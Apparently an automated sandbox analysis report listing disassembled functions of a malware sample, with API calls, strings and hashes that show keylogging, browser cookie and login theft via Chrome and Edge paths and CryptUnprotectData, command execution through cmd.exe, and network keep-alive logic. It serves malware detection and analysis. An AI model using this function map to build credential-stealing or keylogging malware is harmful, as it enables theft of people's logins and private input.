                                                                                        • Instruction ID: dff749dc984b923ba5de2327a6f3f9cc2e67bcaf748228c26ce3aec7d70e92d7
                                                                                        • Opcode Fuzzy Hash: f3a158218bdd67d4c4b1fae7efd00a7e5adabf20f91f0610842615a967fde749
                                                                                        • Instruction Fuzzy Hash: 10119371B442011ADB187B72D832ABD22969F94358F80443FF54AAF2E2DEBD4C51525D
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 0040C5EC Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 72COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                          • Part of subcall function 0040C4C3: PathFileExistsW.SHLWAPI(00000000,\AppData\Local\Google\Chrome\,00000000), ref: 0040C4F6
                                                                                        • PathFileExistsW.SHLWAPI(00000000), ref: 0040C61D
                                                                                        • PathFileExistsW.SHLWAPI(00000000,-00000011,?,00000000,00000000), ref: 0040C688
                                                                                        Strings
                                                                                        • User Data\Profile ?\Network\Cookies, xrefs: 0040C635
                                                                                        • User Data\Default\Network\Cookies, xrefs: 0040C603
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000006.00000001.2139650597.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000006.00000001.2139650597.0000000000474000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000006.00000001.2139650597.0000000000478000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_6_1_400000_nmfsxfjX.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: ExistsFilePath
                                                                                        • String ID: User Data\Default\Network\Cookies$User Data\Profile ?\Network\Cookies
                                                                                        • API String ID: 1174141254-1980882731
                                                                                        • Opcode ID: 3f8b8350712af9d240db3e3edefbc0b5893a2e7bcab5cac2a7822d9b4b4e7b0e
                                                                                        • Instruction ID: e6b9b9a8142aca5ff9e4641a3ff80a721fb4b0471daa7637ae592fad8ebd6223
                                                                                        • Opcode Fuzzy Hash: 3f8b8350712af9d240db3e3edefbc0b5893a2e7bcab5cac2a7822d9b4b4e7b0e
                                                                                        • Instruction Fuzzy Hash: B421037190011996CB14F7A2DC96CEEB738EE50319F40053FB502B31D2EF789A46C698
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 0040C6BB Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 72COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                          • Part of subcall function 0040C526: PathFileExistsW.SHLWAPI(00000000,\AppData\Local\Microsoft\Edge\,00000000), ref: 0040C559
                                                                                        • PathFileExistsW.SHLWAPI(00000000), ref: 0040C6EC
                                                                                        • PathFileExistsW.SHLWAPI(00000000,-00000011,?,00000000,00000000), ref: 0040C757
                                                                                        Strings
                                                                                        • User Data\Profile ?\Network\Cookies, xrefs: 0040C704
                                                                                        • User Data\Default\Network\Cookies, xrefs: 0040C6D2
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000006.00000001.2139650597.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000006.00000001.2139650597.0000000000474000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000006.00000001.2139650597.0000000000478000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_6_1_400000_nmfsxfjX.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: ExistsFilePath
                                                                                        • String ID: User Data\Default\Network\Cookies$User Data\Profile ?\Network\Cookies
                                                                                        • API String ID: 1174141254-1980882731
                                                                                        • Opcode ID: 8e96e49e63ca3bf0ac1f2790d6dd37b6dab53323dba9b7dc4ed1c0216d558f84
                                                                                        • Instruction ID: 83f6a23093d6b0727a30a1d550f3d6f5bdb2bb72864fa742cd8a9fd6423befd9
                                                                                        • Opcode Fuzzy Hash: 8e96e49e63ca3bf0ac1f2790d6dd37b6dab53323dba9b7dc4ed1c0216d558f84
                                                                                        • Instruction Fuzzy Hash: AE21D37190011AD6CB05F7A2DC96CEEB778EE50719B50013FF502B31D2EF789A46C698
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 0040A179 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 70threadCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • CreateThread.KERNEL32(00000000,00000000,0040A27D,004750F0,00000000,00000000), ref: 0040A1FE
                                                                                        • CreateThread.KERNEL32(00000000,00000000,0040A267,004750F0,00000000,00000000), ref: 0040A20E
                                                                                        • CreateThread.KERNEL32(00000000,00000000,0040A289,004750F0,00000000,00000000), ref: 0040A21A
                                                                                          • Part of subcall function 0040B164: GetLocalTime.KERNEL32(?,Offline Keylogger Started,004750F0), ref: 0040B172
                                                                                          • Part of subcall function 0040B164: wsprintfW.USER32 ref: 0040B1F3
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000006.00000001.2139650597.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000006.00000001.2139650597.0000000000474000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000006.00000001.2139650597.0000000000478000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_6_1_400000_nmfsxfjX.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: CreateThread$LocalTimewsprintf
                                                                                        • String ID: Offline Keylogger Started
                                                                                        • API String ID: 465354869-4114347211
                                                                                        • Opcode ID: 3bd749956e3e9a916655ad8ba54339a6dfc039012b8b1fa6949936b121210f93
                                                                                        • Instruction ID: bcf1cfbdc14a627f6781ea3a40f7cea6448602225ce5b2be95dc640702f6c2bd
                                                                                        • Opcode Fuzzy Hash: 3bd749956e3e9a916655ad8ba54339a6dfc039012b8b1fa6949936b121210f93
                                                                                        • Instruction Fuzzy Hash: DE1194B12003187AD220B7369C86CBB765DDA8139CB00057FF946222D2EA795D54CAFB
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 0040AEEE Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 65threadCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                          • Part of subcall function 0040B164: GetLocalTime.KERNEL32(?,Offline Keylogger Started,004750F0), ref: 0040B172
                                                                                          • Part of subcall function 0040B164: wsprintfW.USER32 ref: 0040B1F3
                                                                                          • Part of subcall function 0041B4EF: GetLocalTime.KERNEL32(00000000), ref: 0041B509
                                                                                        • CreateThread.KERNEL32(00000000,00000000,0040A267,?,00000000,00000000), ref: 0040AF6E
                                                                                        • CreateThread.KERNEL32(00000000,00000000,0040A289,?,00000000,00000000), ref: 0040AF7A
                                                                                        • CreateThread.KERNEL32(00000000,00000000,0040A295,?,00000000,00000000), ref: 0040AF86
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000006.00000001.2139650597.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000006.00000001.2139650597.0000000000474000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000006.00000001.2139650597.0000000000478000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_6_1_400000_nmfsxfjX.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: CreateThread$LocalTime$wsprintf
                                                                                        • String ID: Online Keylogger Started
                                                                                        • API String ID: 112202259-1258561607
                                                                                        • Opcode ID: 5352f84320cf4356fc5397d5242ef4f16cbe8c43bf069df42c05d2cedde61efe
                                                                                        • Instruction ID: a86b307176fed80e65d2d8085b20e14cf0e56bf63d45b36b749a5edd9f3e52e0
                                                                                        • Opcode Fuzzy Hash: 5352f84320cf4356fc5397d5242ef4f16cbe8c43bf069df42c05d2cedde61efe
                                                                                        • Instruction Fuzzy Hash: 1401C8A070031939E62076365C87D7F7A5DCA81398F40057FF645362C6D97D1C5586FB
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 0041B4EF Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 59timeCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • GetLocalTime.KERNEL32(00000000), ref: 0041B509
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000006.00000001.2139650597.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000006.00000001.2139650597.0000000000474000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000006.00000001.2139650597.0000000000478000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_6_1_400000_nmfsxfjX.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: LocalTime
                                                                                        • String ID: | $%02i:%02i:%02i:%03i $PkGNG
                                                                                        • API String ID: 481472006-3277280411
                                                                                        • Opcode ID: 978051ae2d71d51f6a46a557316c11cd91a1cbdf249e5825d4a92e87c892c4af
                                                                                        • Instruction ID: b0c371a91d376d28eb23a1cf2c2b6b2589463c7c7bf84255da33bc44f247512a
                                                                                        • Opcode Fuzzy Hash: 978051ae2d71d51f6a46a557316c11cd91a1cbdf249e5825d4a92e87c892c4af
                                                                                        • Instruction Fuzzy Hash: 361181714082055AC304EB62D8419BFB3E9AB44348F50093FF895A21E1EF3CDA49C65A
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 00404F51 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 58timethreadCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • GetLocalTime.KERNEL32(?), ref: 00404F81
                                                                                        • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00404FCD
                                                                                        • CreateThread.KERNEL32(00000000,00000000,00405150,?,00000000,00000000), ref: 00404FE0
                                                                                        Strings
                                                                                        • KeepAlive | Enabled | Timeout: , xrefs: 00404F94
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000006.00000001.2139650597.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000006.00000001.2139650597.0000000000474000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000006.00000001.2139650597.0000000000478000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_6_1_400000_nmfsxfjX.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: Create$EventLocalThreadTime
                                                                                        • String ID: KeepAlive | Enabled | Timeout:
                                                                                        • API String ID: 2532271599-1507639952
                                                                                        • Opcode ID: accc46308d134a6526fb08aee99d3eab32d11686313fa6232e89ca864bb3edf7
                                                                                        • Instruction ID: 982fc92e7e47f2769c776e0d9ab1702947c5453eb715a4cfed9cf45540ca89dc
                                                                                        • Opcode Fuzzy Hash: accc46308d134a6526fb08aee99d3eab32d11686313fa6232e89ca864bb3edf7
                                                                                        • Instruction Fuzzy Hash: A8110671904385AAC720A7778C0DEAB7FA8DBD2710F04046FF54163291DAB89445CBBA
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 00406A63 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 53libraryloaderCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • LoadLibraryA.KERNEL32(crypt32,CryptUnprotectData), ref: 00406A82
                                                                                        • GetProcAddress.KERNEL32(00000000), ref: 00406A89
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000006.00000001.2139650597.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000006.00000001.2139650597.0000000000474000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000006.00000001.2139650597.0000000000478000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_6_1_400000_nmfsxfjX.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: AddressLibraryLoadProc
                                                                                        • String ID: CryptUnprotectData$crypt32
                                                                                        • API String ID: 2574300362-2380590389
                                                                                        • Opcode ID: 58a6a211d8528d7034b6d4e537693813dfb36b0b7d2b88ce6c125ece2ab5d6dc
                                                                                        • Instruction ID: d796ed41fc96dc9ef8d801536240fab0e9422483ab40f89d2a564a4d0f07de08
                                                                                        • Opcode Fuzzy Hash: 58a6a211d8528d7034b6d4e537693813dfb36b0b7d2b88ce6c125ece2ab5d6dc
                                                                                        • Instruction Fuzzy Hash: 6201B535B00216ABCB18DFAD9D449ABBBB8EB49300F14817EE95AE3341D674D9008BA4
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 0044C253 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 50COMMONLIBRARYCODE
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • SetFilePointerEx.KERNEL32(00000000,00000000,00000002,FF8BC369,00000000,FF8BC35D,00000000,10558B1C,10558B1C,PkGNG,0044C302,FF8BC369,00000000,00000002,00000000,PkGNG), ref: 0044C28C
                                                                                        • GetLastError.KERNEL32 ref: 0044C296
                                                                                        • __dosmaperr.LIBCMT ref: 0044C29D
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000006.00000001.2139650597.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000006.00000001.2139650597.0000000000474000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000006.00000001.2139650597.0000000000478000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_6_1_400000_nmfsxfjX.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: ErrorFileLastPointer__dosmaperr
                                                                                        • String ID: PkGNG
                                                                                        • API String ID: 2336955059-263838557
                                                                                        • Opcode ID: 60eaf30ffa5a6b77e16cdf42a69bcf8f7fa5cf007f91ab5b57ca5c6e56bd7837
                                                                                        • Instruction ID: 03228b3a5a263cac3d3762c0c6cb9bea0ee6cefe7ee70a3785aa569069518732
                                                                                        • Opcode Fuzzy Hash: 60eaf30ffa5a6b77e16cdf42a69bcf8f7fa5cf007f91ab5b57ca5c6e56bd7837
                                                                                        • Instruction Fuzzy Hash: 9E016D32A11104BBDF008FE9CC4089E3719FB86320B28039AF810A7290EAB5DC118B64
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 0040515C Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 46synchronizationCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • WaitForSingleObject.KERNEL32(?,000003E8,?,?,?,00405159), ref: 00405173
                                                                                        • CloseHandle.KERNEL32(?), ref: 004051CA
                                                                                        • SetEvent.KERNEL32(?), ref: 004051D9
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000006.00000001.2139650597.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000006.00000001.2139650597.0000000000474000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000006.00000001.2139650597.0000000000478000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_6_1_400000_nmfsxfjX.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: CloseEventHandleObjectSingleWait
                                                                                        • String ID: Connection Timeout
                                                                                        • API String ID: 2055531096-499159329
                                                                                        • Opcode ID: 6ba0741fc7cdd8782e8632b0dc009c189a51354901c2dba2396252722e458400
                                                                                        • Instruction ID: e4880b57ed2806ada623013920947221b56867654f576af2420d72dde76e11cf
                                                                                        • Opcode Fuzzy Hash: 6ba0741fc7cdd8782e8632b0dc009c189a51354901c2dba2396252722e458400
                                                                                        • Instruction Fuzzy Hash: 1201D831A40F40AFE7257B368D9552BBBE0FF01302704097FE68396AE2D6789800CF59
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 0040E7C5 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 45COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • __CxxThrowException@8.LIBVCRUNTIME ref: 0040E833
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000006.00000001.2139650597.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000006.00000001.2139650597.0000000000474000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000006.00000001.2139650597.0000000000478000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_6_1_400000_nmfsxfjX.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: Exception@8Throw
                                                                                        • String ID: ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
                                                                                        • API String ID: 2005118841-1866435925
                                                                                        • Opcode ID: 8dcc56bc0b3abd67e197b42ddab56c72444c781ea05e0f6efff8352e2a22a648
                                                                                        • Instruction ID: aca7d9cae529c24a85643cb8f0975e7fdd15ab88b82278639a3f13e82648cb6f
                                                                                        • Opcode Fuzzy Hash: 8dcc56bc0b3abd67e197b42ddab56c72444c781ea05e0f6efff8352e2a22a648
                                                                                        • Instruction Fuzzy Hash: 2C01B1315443086AE618F693C843FAA73585B10708F108C2FAA15761C2F67D6961C66B
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 0041CAE1 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 42windowCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • FormatMessageA.KERNEL32(00001100,00000000,00000000,00000400,?,00000000,00000000,00474EF8,00474EF8,PkGNG,00404A40), ref: 0041CB09
                                                                                        • LocalFree.KERNEL32(?,?), ref: 0041CB2F
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000006.00000001.2139650597.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000006.00000001.2139650597.0000000000474000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000006.00000001.2139650597.0000000000478000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_6_1_400000_nmfsxfjX.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: FormatFreeLocalMessage
                                                                                        • String ID: @J@$PkGNG
                                                                                        • API String ID: 1427518018-1416487119
                                                                                        • Opcode ID: e6692f477abb5315ab95d0a6b8ad5d72714dea7d13d74ae1a0c0e8a867cee630
                                                                                        • Instruction ID: 02a9d8e2c753fe243ccbc909122ce1ddd8f8b45a09ed5088e6b723b988b0f700
                                                                                        • Opcode Fuzzy Hash: e6692f477abb5315ab95d0a6b8ad5d72714dea7d13d74ae1a0c0e8a867cee630
                                                                                        • Instruction Fuzzy Hash: 5EF0A434B0021AAADF08A7A6DD4ADFF7769DB84305B10007FB606B21D1EEB86D05D659
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 0040DFA6 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 39COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • std::_Lockit::_Lockit.LIBCPMT ref: 0040DFB1
                                                                                        • std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 0040DFF0
                                                                                          • Part of subcall function 00435640: _Yarn.LIBCPMT ref: 0043565F
                                                                                          • Part of subcall function 00435640: _Yarn.LIBCPMT ref: 00435683
                                                                                        • __CxxThrowException@8.LIBVCRUNTIME ref: 0040E016
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000006.00000001.2139650597.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000006.00000001.2139650597.0000000000474000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000006.00000001.2139650597.0000000000478000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_6_1_400000_nmfsxfjX.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: Yarnstd::_$Exception@8Locinfo::_Locinfo_ctorLockitLockit::_Throw
                                                                                        • String ID: bad locale name
                                                                                        • API String ID: 3628047217-1405518554
                                                                                        • Opcode ID: 03a3a1b6538e95a80bbc96a5a3230d3fb174e533ca0510e3d942a7448ac3be7a
                                                                                        • Instruction ID: c9d4814c50014869750c7e26a4e1a69426a580a77e14145940ab7c7d7e24a8db
                                                                                        • Opcode Fuzzy Hash: 03a3a1b6538e95a80bbc96a5a3230d3fb174e533ca0510e3d942a7448ac3be7a
                                                                                        • Instruction Fuzzy Hash: EAF081314006049AC634FA62D863B9AB7B89F14718F504A7FB906228D1EF7CBA1CCA4C
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 0041376F Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 38registryCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • RegCreateKeyA.ADVAPI32(80000001,Control Panel\Desktop,0046611C), ref: 0041377E
                                                                                        • RegSetValueExA.ADVAPI32(0046611C,?,00000000,?,00000000,00000000,Control Panel\Desktop,?,?,0041CAB1,WallpaperStyle,0046611C,00000001,00474EE0,00000000), ref: 004137A6
                                                                                        • RegCloseKey.ADVAPI32(0046611C,?,?,0041CAB1,WallpaperStyle,0046611C,00000001,00474EE0,00000000,?,0040875D,00000001), ref: 004137B1
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000006.00000001.2139650597.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000006.00000001.2139650597.0000000000474000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000006.00000001.2139650597.0000000000478000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_6_1_400000_nmfsxfjX.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: CloseCreateValue
                                                                                        • String ID: Control Panel\Desktop
                                                                                        • API String ID: 1818849710-27424756
                                                                                        • Opcode ID: a1b035586d8a94c78f1a8b9bfdab4f73b16582c77fe3bde9cdb94950c835db19
                                                                                        • Instruction ID: c04290829ccef693e4e8b5b7d06cdf9a2950efbbd707a4c1379ff92f90edcb59
                                                                                        • Opcode Fuzzy Hash: a1b035586d8a94c78f1a8b9bfdab4f73b16582c77fe3bde9cdb94950c835db19
                                                                                        • Instruction Fuzzy Hash: B8F06272400118FBCB009FA1DD45DEA376CEF04B51F108566FD09A61A1D7359E14DB54
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 00416C2D Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 33threadCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • CreateThread.KERNEL32(00000000,00000000,Function_0001D45D,00000000,00000000,00000000), ref: 00416C47
                                                                                        • ShowWindow.USER32(00000009), ref: 00416C61
                                                                                        • SetForegroundWindow.USER32 ref: 00416C6D
                                                                                          • Part of subcall function 0041CD9B: AllocConsole.KERNEL32(00475338), ref: 0041CDA4
                                                                                          • Part of subcall function 0041CD9B: GetConsoleWindow.KERNEL32 ref: 0041CDAA
                                                                                          • Part of subcall function 0041CD9B: ShowWindow.USER32(00000000,00000000), ref: 0041CDBD
                                                                                          • Part of subcall function 0041CD9B: SetConsoleOutputCP.KERNEL32(000004E4), ref: 0041CDE2
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000006.00000001.2139650597.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000006.00000001.2139650597.0000000000474000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000006.00000001.2139650597.0000000000478000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_6_1_400000_nmfsxfjX.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: Window$Console$Show$AllocCreateForegroundOutputThread
                                                                                        • String ID: !D@
                                                                                        • API String ID: 186401046-604454484
                                                                                        • Opcode ID: cc4916408580e951ac93bfe67ce7d507046645e77a3ccf4d0f5d95b4476223b5
                                                                                        • Instruction ID: c1d0571eb829819ca76672189d51ce116019f2d3a91c4b5ec781e9fa27a10d2f
                                                                                        • Opcode Fuzzy Hash: cc4916408580e951ac93bfe67ce7d507046645e77a3ccf4d0f5d95b4476223b5
                                                                                        • Instruction Fuzzy Hash: 9EF05E70158201EAD720AB62EC45AFA7B69EB54351F00483BF849D14F2DB398C85C69D
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 004160EE Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 27COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • ShellExecuteW.SHELL32(00000000,open,cmd.exe,00000000,00000000,00000000), ref: 00416130
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000006.00000001.2139650597.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000006.00000001.2139650597.0000000000474000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000006.00000001.2139650597.0000000000478000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_6_1_400000_nmfsxfjX.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: ExecuteShell
                                                                                        • String ID: /C $cmd.exe$open
                                                                                        • API String ID: 587946157-3896048727
                                                                                        • Opcode ID: c4367f8ee6a7455f33dbff058f7f38a065b0826cdce92a2e59ef50dc08291be7
                                                                                        • Instruction ID: 0a18f3537a1213b4b5dca9b82f73c842755a7e35c30cee8a650de64661b344da
                                                                                        • Opcode Fuzzy Hash: c4367f8ee6a7455f33dbff058f7f38a065b0826cdce92a2e59ef50dc08291be7
                                                                                        • Instruction Fuzzy Hash: 0DE0C0B0208345AAC705E775CC95CBF73ADAA94749B50483F7142A20E2EF7C9D49C659
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 0040C00C Relevance: 6.1, APIs: 2, Strings: 2, Instructions: 103sleepCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Strings
                                                                                        • [Cleared browsers logins and cookies.], xrefs: 0040C0E4
                                                                                        • Cleared browsers logins and cookies., xrefs: 0040C0F5
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000006.00000001.2139650597.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000006.00000001.2139650597.0000000000474000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000006.00000001.2139650597.0000000000478000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_6_1_400000_nmfsxfjX.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: Sleep
                                                                                        • String ID: [Cleared browsers logins and cookies.]$Cleared browsers logins and cookies.
                                                                                        • API String ID: 3472027048-1236744412
                                                                                        • Opcode ID: 37d1bfc06d07939eb796f91d911b97d059918d73889df1aded7d392522dc90d3
                                                                                        • Instruction ID: fac43f66edf0589ccdcbb227709f1a337e776f7542e83b73a027453bfa593f46
                                                                                        • Opcode Fuzzy Hash: 37d1bfc06d07939eb796f91d911b97d059918d73889df1aded7d392522dc90d3
                                                                                        • Instruction Fuzzy Hash: 2531C804348380E9D6116BF554567AB7B814E93744F08457FB9C42B3D3D97E4848C7AF
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 0040A529 Relevance: 6.1, APIs: 2, Strings: 2, Instructions: 71sleepCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                          • Part of subcall function 0041C551: GetForegroundWindow.USER32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0041C561
                                                                                          • Part of subcall function 0041C551: GetWindowTextLengthW.USER32(00000000), ref: 0041C56A
                                                                                          • Part of subcall function 0041C551: GetWindowTextW.USER32(00000000,00000000,00000001), ref: 0041C594
                                                                                        • Sleep.KERNEL32(000001F4), ref: 0040A573
                                                                                        • Sleep.KERNEL32(00000064), ref: 0040A5FD
                                                                                        Strings
                                                                                        Memory Dump Source
